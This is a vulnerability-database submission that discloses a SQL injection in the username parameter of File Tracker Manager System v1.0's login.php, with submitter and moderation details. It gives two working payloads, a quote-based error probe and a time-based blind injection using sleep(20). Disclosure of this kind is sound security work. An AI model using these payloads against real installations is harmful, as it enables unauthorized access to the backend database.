| Title | File Tracker Manager System v1.0 /file_manager/login.php post parameter username exists SQL injection vulnerability |
|---|
| Description | An issue was discovered in File Tracker Manager System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /file_manager/login.php post parameter username.
Payload1: username=a'&password=b
Payload2:username=a' and (select 1 from (select(sleep(20)))a)-- a&password=b |
|---|
| Source | ⚠️ https://github.com/godownio/bug_report/blob/main/vendors/hemedy99/File%20Tracker%20Manager%20System/SQLi-1.md |
|---|
| User | godownio (UID 42581) |
|---|
| Submission | 03/09/2023 07:02 (3 years ago) |
|---|
| Moderation | 03/09/2023 15:39 (9 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 222648 [SourceCodester File Tracker Manager System 1.0 POST Parameter /file_manager/login.php Username sql injection] |
|---|
| Points | 19 |
|---|